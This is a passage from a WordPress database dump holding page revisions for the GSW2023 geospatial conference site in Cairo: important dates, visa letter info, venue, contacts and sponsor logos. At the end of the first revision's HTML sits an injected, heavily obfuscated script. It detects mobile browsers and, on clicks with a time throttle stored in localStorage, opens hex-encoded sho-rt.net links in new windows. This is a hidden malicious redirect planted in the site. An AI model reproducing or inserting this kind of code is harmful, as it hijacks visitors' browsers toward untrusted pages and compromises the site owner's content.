18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-18 13:46:48','2023-06-18 13:46:48','',3066,'https://gsw2023.com/?p=4710',0,'revision','',0),
(4711,1,'2023-06-18 13:47:56','2023-06-18 13:47:56','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686739986286{margin-top: -35px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> 